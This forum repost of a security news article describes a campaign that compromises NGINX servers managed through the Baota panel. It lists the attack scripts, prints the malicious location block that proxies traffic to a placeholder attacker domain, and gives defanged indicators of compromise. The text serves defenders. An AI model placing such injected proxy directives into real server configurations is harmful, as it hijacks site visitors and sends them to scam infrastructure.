Threat Actors Hacking NGINX Servers to Redirect Web Traffic to Malicious Servers - Printable Version +- Tech Press Releases (https://techpressreleases.io/press-releases) +-- Forum: Newsgroup (https://techpressreleases.io/press-releases/forumdisplay.php?fid=3) +--- Forum: 2020 (https://techpressreleases.io/press-releases/forumdisplay.php?fid=4) +---- Forum: 2026 (https://techpressreleases.io/press-releases/forumdisplay.php?fid=13) +---- Thread: Threat Actors Hacking NGINX Servers to Redirect Web Traffic to Malicious Servers (/showthread.php?tid=30)

Threat Actors Hacking NGINX Servers to Redirect Web Traffic to Malicious Servers - jasongeek - 02-06-2026 Threat Actors Hacking NGINX Servers to Redirect Web Traffic to Malicious Servers By Abinaya - February 5, 2026 A sophisticated campaign in which threat actors are stealthily compromising NGINX servers to redirect web traffic to malicious destinations. The attackers, previously linked to “React2Shell” exploits, are now targeting NGINX configurations, specifically those using the Baota (BT) management panel, widely used in Asia. How the Attack Works Instead of installing traditional malware, these attackers modify the server’s legitimate configuration files. By injecting malicious directives into NGINX’s location blocks, they can intercept user traffic and route it through attacker-controlled servers without the site owner noticing immediately. The core of the attack relies on the proxy_pass directive. This standard NGINX feature is designed to forward traffic to backend servers (like a PHP application). The campaign uses a straightforward, automated workflow involving several shell scripts: Script Name Role Primary Function Target zx.sh The Orchestrator Initializes environment and downloads required tools Acts as entry point for the attack chain bt.sh Baota Injector Scans for Baota panel configs and injects malicious code Targets /www/server/panel/vhost/nginx 4zdh.sh Advanced Injection Injects payload into NGINX configs after validation Targets generic Linux NGINX installs zdh.sh Advanced Injection Same as 4zdh.sh with config verification Collects and uploads the hijacked domain list ok.sh Exfiltration Acts as an entry point for the attack chain Sends data to attacker C2 server However, the attackers reconfigure it to send users to their own malicious domains, such as gambling or scam sites. They also use proxy_set_header to ensure the hijacked traffic retains legitimate-looking headers, making the redirection harder to detect in standard logs. location /%PATH%/ {     set $fullurl "$scheme://$host$request_uri";     rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break;     proxy_set_header Host [Attacker_Domain];     proxy_set_header X-Real-IP $remote_addr;     proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;     proxy_set_header X-Forwarded-Proto $scheme;     proxy_set_header User-Agent $http_user_agent;     proxy_set_header Referer $http_referer;     proxy_ssl_server_name on;     proxy_pass http://[Attacker_Domain]; } The campaign heavily targets Asian Top-Level Domains (TLDs) like .in, .id, .th, and .bd, as well as government (.gov) and educational (.edu) websites. Datadog Security Research advises administrators to check their NGINX configuration files for unexpected proxy_pass directives pointing to the following known malicious domains: Indicator Type Value Threat Category Status Notes Domain xzz.pier46[.]com Suspected C2 / Malware Infrastructure Active (unverified) Observed in malicious campaign Domain ide.hashbank8[.]com Suspected C2 / Malware Infrastructure Active (unverified) Used for attacker communications Domain th.cogicpt[.]org Suspected C2 / Malware Infrastructure Active (unverified) Potential exfiltration endpoint Additionally, network logs showing traffic to IP 158.94.210[.]227 indicate active communication with the attackers’ infrastructure. https://cybersecuritynews.com/threat-actors-hacking-nginx-servers/